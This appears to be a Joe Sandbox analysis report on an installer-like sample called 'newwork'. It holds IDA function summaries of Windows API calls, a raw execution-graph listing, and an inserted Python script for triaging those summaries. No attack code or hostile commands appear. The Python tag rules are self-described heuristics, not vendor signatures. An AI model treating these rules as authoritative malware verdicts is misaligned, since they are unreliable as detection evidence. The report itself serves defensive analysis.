                                                                                        • String ID: AMPM$:mm$:mm:ss$m/d/yy$mmmm d, yyyy
                                                                                        • API String ID: 1044490935-665933166
                                                                                        • Opcode ID: 2becd82198b95216644133442ecc563e5ef80f5327bc31795fb041598c227e39
                                                                                        • Instruction ID: cc137df54ae1fcbb63b87987e69a719e9c27c4b31815d0debc5c9b1d2781c89a
                                                                                        • Opcode Fuzzy Hash: 2becd82198b95216644133442ecc563e5ef80f5327bc31795fb041598c227e39
                                                                                        • Instruction Fuzzy Hash: F8515374B00548ABDB00EBA59891A5F7769DB88304F50D5BBB515BB3C6CA3DCA058F1C
                                                                                        APIs
                                                                                        • RtlEnterCriticalSection.KERNEL32(0040C41C,00000000,00401AB4), ref: 00401A09
                                                                                        • LocalFree.KERNEL32(0070AB68,00000000,00401AB4), ref: 00401A1B
                                                                                        • VirtualFree.KERNEL32(?,00000000,00008000,0070AB68,00000000,00401AB4), ref: 00401A3A
                                                                                        • LocalFree.KERNEL32(0070BB68,?,00000000,00008000,0070AB68,00000000,00401AB4), ref: 00401A79
                                                                                        • RtlLeaveCriticalSection.KERNEL32(0040C41C,00401ABB), ref: 00401AA4
                                                                                        • RtlDeleteCriticalSection.KERNEL32(0040C41C,00401ABB), ref: 00401AAE
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.3555582352.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.3555526841.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.3555640810.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.3555715971.0000000000411000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_newwork.jbxd
                                                                                        Similarity
                                                                                        • API ID: CriticalFreeSection$Local$DeleteEnterLeaveVirtual
                                                                                        • String ID:
                                                                                        • API String ID: 3782394904-0
                                                                                        • Opcode ID: 57d208b384dc2f586c03b96f4df297de7af50f17441c1957de60d2bf1c39d9ad
                                                                                        • Instruction ID: 5447b05044442752c1d56c7733342563ab4b4f61826a3093f511f794066d9233
                                                                                        • Opcode Fuzzy Hash: 57d208b384dc2f586c03b96f4df297de7af50f17441c1957de60d2bf1c39d9ad
                                                                                        • Instruction Fuzzy Hash: 91116330341280DAD711ABA59EE2F623668B785748F44437EF444B62F2C67C9840CA9D
                                                                                        APIs
                                                                                        • MessageBoxA.USER32(00000000,Runtime error at 00000000,Error,00000000), ref: 00403D9D
                                                                                        • ExitProcess.KERNEL32 ref: 00403DE5
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.3555582352.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.3555526841.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.3555640810.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.3555715971.0000000000411000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_newwork.jbxd
                                                                                        Similarity
                                                                                        • API ID: ExitMessageProcess
                                                                                        • String ID: Error$Runtime error at 00000000$9@
                                                                                        • API String ID: 1220098344-1503883590
                                                                                        • Opcode ID: 0b7abc0913d0e9b6482778e2bb40dc1e8adb9ed549d30d0444a38b969016e341
                                                                                        • Instruction ID: db3008c0e6bc5d60e05df0545d3e9f81ce91e923819fa2a9fb93000da4b6b716
                                                                                        • Opcode Fuzzy Hash: 0b7abc0913d0e9b6482778e2bb40dc1e8adb9ed549d30d0444a38b969016e341
                                                                                        • Instruction Fuzzy Hash: B521F830A04341CAE714EFA59AD17153E98AB49349F04837BD500B73E3C77C8A45C76E
                                                                                        APIs
                                                                                        • MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,00000000,?,00000400), ref: 004036F2
                                                                                        • SysAllocStringLen.OLEAUT32(?,00000000), ref: 004036FD
                                                                                        • MultiByteToWideChar.KERNEL32(00000000,00000000,?,00000000,00000000,00000000), ref: 00403710
                                                                                        • SysAllocStringLen.OLEAUT32(00000000,00000000), ref: 0040371A
                                                                                        • MultiByteToWideChar.KERNEL32(00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 00403729
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.3555582352.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.3555526841.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.3555640810.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.3555715971.0000000000411000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_newwork.jbxd
                                                                                        Similarity
                                                                                        • API ID: ByteCharMultiWide$AllocString
                                                                                        • String ID:
                                                                                        • API String ID: 262959230-0
                                                                                        • Opcode ID: 759139aa8138bb4f1b890a81a570935fc2f09484a8ccbcda4eb7e9d11bc9ffe5
                                                                                        • Instruction ID: 1285967c487f36a4f1f77a8b8e1f1fe351824cacfdb80e5859a13ebcd08b75b2
                                                                                        • Opcode Fuzzy Hash: 759139aa8138bb4f1b890a81a570935fc2f09484a8ccbcda4eb7e9d11bc9ffe5
                                                                                        • Instruction Fuzzy Hash: 17F068A13442543AF56075A75C43FAB198CCB45BAEF10457FF704FA2C2D8B89D0492BD
                                                                                        APIs
                                                                                        • RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,00000000,?,00000000,00406F48,?,00000000,00409918,00000000), ref: 00406E4C
                                                                                        • RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,00000000,70000000,?,?,00000000,00000000,00000000,?,00000000,00406F48,?,00000000), ref: 00406EBC
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.3555582352.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.3555526841.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.3555640810.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.3555715971.0000000000411000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_newwork.jbxd
                                                                                        Similarity
                                                                                        • API ID: QueryValue
                                                                                        • String ID: )q@
                                                                                        • API String ID: 3660427363-2284170586
                                                                                        • Opcode ID: 32d2d681139902fa63b50b1e86c1c6042aee641263ad409bd5d16b68eaa8278f
                                                                                        • Instruction ID: 22a93fbabe645b78fd14ced98f65bd4bcb22fe3fd6f8222f7fa8e6a3c98f8dfc
                                                                                        • Opcode Fuzzy Hash: 32d2d681139902fa63b50b1e86c1c6042aee641263ad409bd5d16b68eaa8278f
                                                                                        • Instruction Fuzzy Hash: E6415E31D0021AAFDB21DF95C881BAFB7B8EB04704F56447AE901F7280D738AF108B99
                                                                                        APIs
                                                                                        • MessageBoxA.USER32(00000000,00000000,Setup,00000010), ref: 00409CBD
                                                                                        Strings
                                                                                        • Setup, xrefs: 00409CAD
                                                                                        • The Setup program accepts optional command line parameters./HELP, /?Shows this information./SP-Disables the This will install... Do you wish to continue? prompt at the beginning of Setup./SILENT, /VERYSILENTInstructs Setup to be silent or very si, xrefs: 00409CA1
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.3555582352.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.3555526841.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.3555640810.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.3555715971.0000000000411000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_newwork.jbxd
                                                                                        Similarity
                                                                                        • API ID: Message
                                                                                        • String ID: Setup$The Setup program accepts optional command line parameters./HELP, /?Shows this information./SP-Disables the This will install... Do you wish to continue? prompt at the beginning of Setup./SILENT, /VERYSILENTInstructs Setup to be silent or very si
                                                                                        • API String ID: 2030045667-3271211647
                                                                                        • Opcode ID: bc66b1cf8cea732a030952d466b76090b354ad7a58696f118c0a4b0261ee3717
                                                                                        • Instruction ID: b8b600ed6bdfe48e96a015bdf4867c85bc36f5512d0f27a60c0f94c744360238
                                                                                        • Opcode Fuzzy Hash: bc66b1cf8cea732a030952d466b76090b354ad7a58696f118c0a4b0261ee3717
                                                                                        • Instruction Fuzzy Hash: 8EE0E5302482087EE311EA528C13F6A7BACE789B04F600477F900B15C3D6786E00A068
                                                                                        APIs
                                                                                        • GetModuleHandleA.KERNEL32(00000000,0040A60E), ref: 004030E3
                                                                                        • GetCommandLineA.KERNEL32(00000000,0040A60E), ref: 004030EE
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.3555582352.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.3555526841.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.3555640810.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.3555715971.0000000000411000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_newwork.jbxd
                                                                                        Similarity
                                                                                        • API ID: CommandHandleLineModule
                                                                                        • String ID: U1hd.@
                                                                                        • API String ID: 2123368496-2904493091
                                                                                        • Opcode ID: ab44cebb113f23cc453db0582047ce3f33ed2b100303cb8959b7892e21e32e4b
                                                                                        • Instruction ID: 0f926add87520dc699e98d27074396f9fab16295c11a520b4b5863bd90c7cb52
                                                                                        • Opcode Fuzzy Hash: ab44cebb113f23cc453db0582047ce3f33ed2b100303cb8959b7892e21e32e4b
                                                                                        • Instruction Fuzzy Hash: 03C01274541300CAD328AFF69E8A304B990A385349F40823FA608BA2F1CA7C4201EBDD
                                                                                        APIs
                                                                                        • Sleep.KERNEL32(?,?,?,?,0000000D,?,0040ABED,000000FA,00000032,0040AC54), ref: 004094F7
                                                                                        • Sleep.KERNEL32(?,?,?,?,0000000D,?,0040ABED,000000FA,00000032,0040AC54), ref: 00409507
                                                                                        • GetLastError.KERNEL32(?,?,?,0000000D,?,0040ABED,000000FA,00000032,0040AC54), ref: 0040951A
                                                                                        • GetLastError.KERNEL32(?,?,?,0000000D,?,0040ABED,000000FA,00000032,0040AC54), ref: 00409524
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.3555582352.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.3555526841.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.3555640810.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.3555715971.0000000000411000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_newwork.jbxd
                                                                                        Similarity
                                                                                        • API ID: ErrorLastSleep
                                                                                        • String ID:
                                                                                        • API String ID: 1458359878-0
                                                                                        • Opcode ID: 97bb3b87fdda019371420e794be163fcf62410a15a23215566f33b90e6dc6563
                                                                                        • Instruction ID: cd4a420f7ace5638a97e0bdb8a1e9fccbb234b9240edd4770f97938e6011a3cc
                                                                                        • Opcode Fuzzy Hash: 97bb3b87fdda019371420e794be163fcf62410a15a23215566f33b90e6dc6563
                                                                                        • Instruction Fuzzy Hash: 16F0967360451477CA35A5AF9D81A5F634DDAD1354B10813BE945F3283C538DD0142A9
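The function summaries above follow one fixed text layout: an APIs list of `Name.MODULE(args), ref: VA` lines, the .sdmp region the code was lifted from, and the Similarity fields (API ID, String ID, opcode and instruction fuzzy hashes). The Python below is an added example, not code from Joe Sandbox or from this report, that parses those blocks into records, tags API combinations an analyst would open first (the MessageBoxA plus ExitProcess runtime-error handler, the Sleep plus GetLastError retry loop, a GetProcAddress resolver, a registry read) and maps every call site to an offset inside its memory dump. Assumptions: each block opens with a bare `APIs` line, the argument list is optional, the only 16-hex-digit field in the .sdmp name is the dumped region's base address, and the tag rules are illustrative heuristics rather than Joe Sandbox signatures. The sample input is an excerpt copied from this page, trimmed to three blocks.

```python
# Added example, not Joe Sandbox code: parse the report's "IDA Plugin" function
# summaries and tag API combinations worth a first look. Block-format
# assumptions are listed in the lead-in and repeated next to each pattern.
import re
from dataclasses import dataclass, field
from typing import Optional

API_RE = re.compile(   # "• Name.MODULE(args), ref: 0040XXXX"; args optional
    r"^•\s*(?P<api>\w+)\.(?P<module>[A-Z0-9_]+)"
    r"(?:\((?P<args>[^)]*)\))?,?\s+ref:\s*(?P<va>[0-9A-Fa-f]{8})$")
FIELD_RE = re.compile(r"^•\s*(?P<key>[A-Za-z ]+?):\s*(?P<val>.*?)\s*$")
# Assumption: the dumped region's base VA is the only 16-hex-digit field in
# the .sdmp file name (0000000000401000 in this report).
REGION_RE = re.compile(r"(?<![0-9A-Fa-f])[0-9A-Fa-f]{16}(?![0-9A-Fa-f])")

# Illustrative tag rules, not Joe Sandbox signatures: (tag, all of, any of).
RULES = [
    ("fatal-error-handler", {"MessageBoxA", "ExitProcess"}, set()),
    ("dynamic-api-resolution", {"GetProcAddress"},
     {"LoadLibraryA", "LoadLibraryExA", "GetModuleHandleA"}),
    ("registry-read", set(), {"RegQueryValueExA", "RegQueryValueExW"}),
    ("sleep-retry-loop", {"Sleep", "GetLastError"}, set()),
]


@dataclass
class FuncSummary:
    calls: list = field(default_factory=list)   # (api, module, va) in order
    fields: dict = field(default_factory=dict)  # "API ID", fuzzy hashes, ...
    region_base: Optional[int] = None           # base VA of the source .sdmp

    @property
    def apis(self) -> set:
        return {api for api, _, _ in self.calls}

    def tags(self) -> list:
        a = self.apis
        return [t for t, need_all, need_any in RULES
                if need_all <= a and (not need_any or a & need_any)]

    def dump_offsets(self) -> list:   # (api, offset) inside the dump region
        if self.region_base is None:
            return []
        return [(api, va - self.region_base) for api, _, va in self.calls]


def parse_summaries(text: str) -> list:
    funcs, cur = [], None
    for raw in text.splitlines():
        line = raw.strip()
        if line == "APIs":                  # a bare "APIs" opens each block
            cur = FuncSummary()
            funcs.append(cur)
        elif cur is None:
            continue
        elif (m := API_RE.match(line)):
            cur.calls.append((m["api"], m["module"], int(m["va"], 16)))
        elif (m := FIELD_RE.match(line)):
            cur.fields[m["key"]] = m["val"]
            if m["key"] == "Source File" and (r := REGION_RE.search(m["val"])):
                cur.region_base = int(r.group(0), 16)
    return funcs


def triage(text: str) -> list:
    """One dict per function: API ID, APIs, tags, call-site VA range, hash."""
    rows = []
    for f in parse_summaries(text):
        vas = [va for _, _, va in f.calls]
        rows.append({"api_id": f.fields.get("API ID", ""),
                     "apis": sorted(f.apis), "tags": f.tags(),
                     "va_range": (min(vas), max(vas)) if vas else None,
                     "fuzzy_hash": f.fields.get("Instruction Fuzzy Hash", "")})
    return rows


# Excerpt copied from this report (three function blocks, headers trimmed).
SAMPLE = """\
APIs
• MessageBoxA.USER32(00000000,Runtime error at 00000000,Error,00000000), ref: 00403D9D
• ExitProcess.KERNEL32 ref: 00403DE5
• Source File: 00000000.00000002.3555582352.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• API ID: ExitMessageProcess
• Instruction Fuzzy Hash: B521F830A04341CAE714EFA59AD17153E98AB49349F04837BD500B73E3C77C8A45C76E
APIs
• GetModuleHandleA.KERNEL32(00000000,0040A60E), ref: 004030E3
• GetCommandLineA.KERNEL32(00000000,0040A60E), ref: 004030EE
• API ID: CommandHandleLineModule
APIs
• Sleep.KERNEL32(?,?,?,?,0000000D,?,0040ABED,000000FA,00000032,0040AC54), ref: 004094F7
• GetLastError.KERNEL32(?,?,?,0000000D,?,0040ABED,000000FA,00000032,0040AC54), ref: 0040951A
• API ID: ErrorLastSleep
"""

if __name__ == "__main__":
    for row in triage(SAMPLE):
        print(f"{row['api_id']:<24} {row['apis']} {row['tags']}")
```

Run it over the whole report text to get one line per function. The offsets from `dump_offsets()` are relative to the region named in the Source File line, so they can be used to seek into that .sdmp file and confirm the call-site bytes before trusting the fuzzy hash for clustering.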

                                                                                        Execution Graph

                                                                                        Execution Coverage:16%
                                                                                        Dynamic/Decrypted Code Coverage:0%
                                                                                        Signature Coverage:4.6%
                                                                                        Total number of Nodes:2000
                                                                                        Total number of Limit Nodes:84
                                                                                        [Execution graph rendering omitted: the interactive graph's node/edge listing (entries of the form "<node id> <address> [API name | N API calls]" and "<from>-><to>") is not readable as text. Node labels in it reference these APIs: CallWindowProcA, CharToOemBuffA, CloseHandle, CreateBrushIndirect, CreateMutexA, CreateWindowExA, FindWindowA, FreeLibrary, GetCommandLineA, GetLastError, GetLocaleInfoA, GetMenu, GetMenuItemCount, GetMenuState, GetMenuStringA, GetModuleHandleA, GetProcAddress, GetSysColor, GetSystemDefaultLCID, LoadLibraryA, LoadLibraryExA, LocalAlloc, NtdllDefWindowProc_A, OemToCharBuffA, PostMessageA, RegisterClipboardFormatA, RtlEnterCriticalSection, RtlInitializeCriticalSection, RtlLeaveCriticalSection, SendMessageA, SendNotifyMessageA, SetBkColor, SetErrorMode, SetMenu, SetProcessDEPPolicy, SetPropA, SetTextColor, SetWindowPos, Sleep, TlsGetValue, TlsSetValue, VariantClear, VirtualAlloc, VirtualFree.]
55956 448832 55948->55956 55949->55948 55950 448888 55963 442334 55950->55963 55951 448870 55951->55950 55975 4435d0 18 API calls 55951->55975 55955 4488bc GetLastError 55976 4484c0 18 API calls 55955->55976 55956->55951 55974 4435d0 18 API calls 55956->55974 55958 4488cb 55977 443610 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 55958->55977 55960 4488e0 55978 443620 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 55960->55978 55962 4488e8 55964 443312 55963->55964 55965 44236d 55963->55965 55967 403400 4 API calls 55964->55967 55966 403400 4 API calls 55965->55966 55968 442375 55966->55968 55969 443327 55967->55969 55970 431bd0 18 API calls 55968->55970 55969->55955 55971 442381 55970->55971 55972 443302 55971->55972 55979 441a0c 18 API calls 55971->55979 55972->55955 55974->55956 55975->55950 55976->55958 55977->55960 55978->55962 55979->55971 55980 4165ec DestroyWindow 55981 42e3ef SetErrorMode 50285 441394 50286 44139d 50285->50286 50287 4413ab WriteFile 50285->50287 50286->50287 50288 4413b6 50287->50288 55982 491bf8 55983 491c32 55982->55983 55984 491c34 55983->55984 55986 491c3e 55983->55986 56178 409098 MessageBeep 55984->56178 55988 491c4d 55986->55988 55989 491c76 55986->55989 55987 491c39 55990 403420 4 API calls 55987->55990 55991 446ff8 32 API calls 55988->55991 55994 491cae 55989->55994 55995 491c85 55989->55995 55992 49228a 55990->55992 55993 491c5a 55991->55993 55996 403400 4 API calls 55992->55996 56179 406bb0 55993->56179 56004 491cbd 55994->56004 56005 491ce6 55994->56005 55998 446ff8 32 API calls 55995->55998 55999 492292 55996->55999 56001 491c92 55998->56001 56187 406c00 18 API calls 56001->56187 56007 446ff8 32 API calls 56004->56007 56011 491d0e 56005->56011 56012 491cf5 56005->56012 56006 491c9d 56188 44734c 19 API calls 56006->56188 56009 491cca 56007->56009 56189 406c34 18 API calls 56009->56189 56018 491d1d 56011->56018 56019 491d42 56011->56019 56191 407280 19 API calls 56012->56191 56013 491cd5 56190 44734c 19 API calls 56013->56190 
56016 491cfd 56192 44734c 19 API calls 56016->56192 56020 446ff8 32 API calls 56018->56020 56023 491d7a 56019->56023 56024 491d51 56019->56024 56021 491d2a 56020->56021 56022 4072a8 SetCurrentDirectoryA 56021->56022 56025 491d32 56022->56025 56029 491d89 56023->56029 56030 491db2 56023->56030 56026 446ff8 32 API calls 56024->56026 56193 4470d0 19 API calls 56025->56193 56028 491d5e 56026->56028 56031 42c804 19 API calls 56028->56031 56032 446ff8 32 API calls 56029->56032 56037 491dfe 56030->56037 56038 491dc1 56030->56038 56033 491d69 56031->56033 56034 491d96 56032->56034 56194 44734c 19 API calls 56033->56194 56195 4071f8 22 API calls 56034->56195 56044 491e0d 56037->56044 56045 491e36 56037->56045 56040 446ff8 32 API calls 56038->56040 56039 491da1 56196 44734c 19 API calls 56039->56196 56042 491dd0 56040->56042 56043 446ff8 32 API calls 56042->56043 56046 491de1 56043->56046 56047 446ff8 32 API calls 56044->56047 56051 491e6e 56045->56051 56052 491e45 56045->56052 56197 4918fc 22 API calls 56046->56197 56049 491e1a 56047->56049 56053 42c8a4 19 API calls 56049->56053 56050 491ded 56198 44734c 19 API calls 56050->56198 56060 491e7d 56051->56060 56061 491ea6 56051->56061 56055 446ff8 32 API calls 56052->56055 56056 491e25 56053->56056 56057 491e52 56055->56057 56199 44734c 19 API calls 56056->56199 56059 42c8cc 19 API calls 56057->56059 56062 491e5d 56059->56062 56063 446ff8 32 API calls 56060->56063 56067 491ede 56061->56067 56068 491eb5 56061->56068 56200 44734c 19 API calls 56062->56200 56065 491e8a 56063->56065 56201 42c8fc 19 API calls 56065->56201 56073 491eed 56067->56073 56074 491f16 56067->56074 56070 446ff8 32 API calls 56068->56070 56069 491e95 56202 44734c 19 API calls 56069->56202 56072 491ec2 56070->56072 56075 42c92c 19 API calls 56072->56075 56076 446ff8 32 API calls 56073->56076 56081 491f62 56074->56081 56082 491f25 56074->56082 56077 491ecd 56075->56077 56078 491efa 56076->56078 56203 44734c 19 API calls 56077->56203 56080 42c954 19 API calls 
56078->56080 56083 491f05 56080->56083 56087 491f71 56081->56087 56088 491fb4 56081->56088 56084 446ff8 32 API calls 56082->56084 56204 44734c 19 API calls 56083->56204 56086 491f34 56084->56086 56089 446ff8 32 API calls 56086->56089 56090 446ff8 32 API calls 56087->56090 56095 491fc3 56088->56095 56096 492027 56088->56096 56091 491f45 56089->56091 56093 491f84 56090->56093 56205 42c4f8 19 API calls 56091->56205 56097 446ff8 32 API calls 56093->56097 56094 491f51 56206 44734c 19 API calls 56094->56206 56099 446ff8 32 API calls 56095->56099 56103 492066 56096->56103 56104 492036 56096->56104 56100 491f95 56097->56100 56101 491fd0 56099->56101 56207 491af4 26 API calls 56100->56207 56170 42c608 21 API calls 56101->56170 56116 4920a5 56103->56116 56117 492075 56103->56117 56107 446ff8 32 API calls 56104->56107 56106 491fa3 56208 44734c 19 API calls 56106->56208 56110 492043 56107->56110 56108 491fde 56111 491fe2 56108->56111 56112 492017 56108->56112 56211 452908 Wow64DisableWow64FsRedirection SetLastError Wow64RevertWow64FsRedirection DeleteFileA GetLastError 56110->56211 56115 446ff8 32 API calls 56111->56115 56210 4470d0 19 API calls 56112->56210 56120 491ff1 56115->56120 56125 4920e4 56116->56125 56126 4920b4 56116->56126 56118 446ff8 32 API calls 56117->56118 56121 492082 56118->56121 56119 492050 56212 4470d0 19 API calls 56119->56212 56171 452c80 56120->56171 56124 452770 5 API calls 56121->56124 56129 49208f 56124->56129 56134 49212c 56125->56134 56135 4920f3 56125->56135 56130 446ff8 32 API calls 56126->56130 56127 492061 56127->55987 56128 492001 56209 4470d0 19 API calls 56128->56209 56213 4470d0 19 API calls 56129->56213 56133 4920c1 56130->56133 56214 452e10 Wow64DisableWow64FsRedirection SetLastError Wow64RevertWow64FsRedirection RemoveDirectoryA GetLastError 56133->56214 56142 49213b 56134->56142 56143 492174 56134->56143 56137 446ff8 32 API calls 56135->56137 56139 492102 56137->56139 56138 4920ce 56215 4470d0 19 API calls 56138->56215 56141 446ff8 32 
API calls 56139->56141 56145 492113 56141->56145 56144 446ff8 32 API calls 56142->56144 56148 492187 56143->56148 56154 49223d 56143->56154 56146 49214a 56144->56146 56150 447278 19 API calls 56145->56150 56147 446ff8 32 API calls 56146->56147 56149 49215b 56147->56149 56151 446ff8 32 API calls 56148->56151 56156 447278 19 API calls 56149->56156 56150->55987 56152 4921b4 56151->56152 56153 446ff8 32 API calls 56152->56153 56157 4921cb 56153->56157 56154->55987 56219 446f9c 32 API calls 56154->56219 56156->55987 56216 407ddc 21 API calls 56157->56216 56158 492256 56159 42e8c8 19 API calls 56158->56159 56160 49225e 56159->56160 56220 44734c 19 API calls 56160->56220 56163 4921ed 56164 446ff8 32 API calls 56163->56164 56165 492201 56164->56165 56217 408508 18 API calls 56165->56217 56167 49220c 56218 44734c 19 API calls 56167->56218 56169 492218 56170->56108 56172 452724 2 API calls 56171->56172 56174 452c99 56172->56174 56173 452c9d 56173->56128 56174->56173 56175 452cc1 MoveFileA GetLastError 56174->56175 56176 452760 Wow64RevertWow64FsRedirection 56175->56176 56177 452ce7 56176->56177 56177->56128 56178->55987 56180 406bbf 56179->56180 56181 406be1 56180->56181 56182 406bd8 56180->56182 56184 403778 18 API calls 56181->56184 56183 403400 4 API calls 56182->56183 56185 406bdf 56183->56185 56184->56185 56186 44734c 19 API calls 56185->56186 56186->55987 56187->56006 56188->55987 56189->56013 56190->55987 56191->56016 56192->55987 56193->55987 56194->55987 56195->56039 56196->55987 56197->56050 56198->55987 56199->55987 56200->55987 56201->56069 56202->55987 56203->55987 56204->55987 56205->56094 56206->55987 56207->56106 56208->55987 56209->55987 56210->55987 56211->56119 56212->56127 56213->55987 56214->56138 56215->55987 56216->56163 56217->56167 56218->56169 56219->56158 56220->55987 56221 40cc34 56224 406f10 WriteFile 56221->56224 56225 406f2d 56224->56225 50289 48095d 50294 451004 50289->50294 50291 480971 50304 47fa0c 50291->50304 50293 480995 50295 451011 
50294->50295 50297 451065 50295->50297 50313 408c0c 18 API calls 50295->50313 50310 450e88 50297->50310 50301 45108d 50302 4510d0 50301->50302 50315 408c0c 18 API calls 50301->50315 50302->50291 50320 40b3c8 50304->50320 50306 47fa79 50306->50293 50308 47fa2e 50308->50306 50324 4069dc 50308->50324 50327 476994 50308->50327 50316 450e34 50310->50316 50313->50297 50314 408c0c 18 API calls 50314->50301 50315->50302 50317 450e57 50316->50317 50318 450e46 50316->50318 50317->50301 50317->50314 50319 450e4b InterlockedExchange 50318->50319 50319->50317 50321 40b3d3 50320->50321 50323 40b3f3 50321->50323 50343 402678 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 50321->50343 50323->50308 50325 402648 18 API calls 50324->50325 50326 4069e7 50325->50326 50326->50308 50336 4769c5 50327->50336 50342 476a0e 50327->50342 50328 451294 35 API calls 50328->50336 50329 476a59 50344 451294 50329->50344 50330 451294 35 API calls 50330->50342 50333 476a70 50335 403420 4 API calls 50333->50335 50334 4038a4 18 API calls 50334->50342 50337 476a8a 50335->50337 50336->50328 50336->50342 50350 4038a4 50336->50350 50359 403744 50336->50359 50363 403450 50336->50363 50337->50308 50340 403744 18 API calls 50340->50342 50341 403450 18 API calls 50341->50342 50342->50329 50342->50330 50342->50334 50342->50340 50342->50341 50343->50323 50345 4512a4 50344->50345 50346 4512af 50344->50346 50345->50333 50369 451238 35 API calls 50346->50369 50348 4512ba 50348->50345 50370 408c0c 18 API calls 50348->50370 50351 4038b1 50350->50351 50358 4038e1 50350->50358 50353 4038da 50351->50353 50356 4038bd 50351->50356 50352 403400 4 API calls 50355 4038cb 50352->50355 50354 4034bc 18 API calls 50353->50354 50354->50358 50355->50336 50371 402678 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 50356->50371 50358->50352 50360 40374a 50359->50360 50362 40375b 50359->50362 50361 4034bc 18 API calls 50360->50361 50360->50362 50361->50362 50362->50336 50365 403454 50363->50365 50367 403464 50363->50367 50364 403490 
50364->50336 50366 4034bc 18 API calls 50365->50366 50365->50367 50366->50367 50367->50364 50368 402660 4 API calls 50367->50368 50368->50364 50369->50348 50370->50345 50371->50355 50372 41ee54 50373 41ee63 IsWindowVisible 50372->50373 50374 41ee99 50372->50374 50373->50374 50375 41ee6d IsWindowEnabled 50373->50375 50375->50374 50376 41ee77 50375->50376 50377 402648 18 API calls 50376->50377 50378 41ee81 EnableWindow 50377->50378 50378->50374 50379 46bb10 50380 46bb44 50379->50380 50412 46bfad 50379->50412 50382 46bb80 50380->50382 50385 46bbdc 50380->50385 50386 46bbba 50380->50386 50387 46bbcb 50380->50387 50388 46bb98 50380->50388 50389 46bba9 50380->50389 50381 403400 4 API calls 50384 46bfec 50381->50384 50382->50412 50470 468c74 50382->50470 50390 403400 4 API calls 50384->50390 50702 46baa0 59 API calls 50385->50702 50435 46b6d0 50386->50435 50701 46b890 81 API calls 50387->50701 50699 46b420 61 API calls 50388->50699 50700 46b588 56 API calls 50389->50700 50396 46bff4 50390->50396 50397 46bb9e 50397->50382 50397->50412 50398 46bc5b 50402 414ae8 18 API calls 50398->50402 50403 46bd7e 50398->50403 50406 42cbc0 20 API calls 50398->50406 50408 403450 18 API calls 50398->50408 50409 46af68 37 API calls 50398->50409 50398->50412 50413 46bdd7 50398->50413 50431 46be9f 50398->50431 50473 468bb0 50398->50473 50481 46acd4 50398->50481 50626 483084 50398->50626 50739 46b1dc 33 API calls 50398->50739 50399 46bc18 50399->50398 50399->50412 50703 494da0 50399->50703 50402->50398 50722 48358c 137 API calls 50403->50722 50406->50398 50407 46bd99 50407->50412 50408->50398 50409->50398 50412->50381 50488 469f1c 50413->50488 50414 46af68 37 API calls 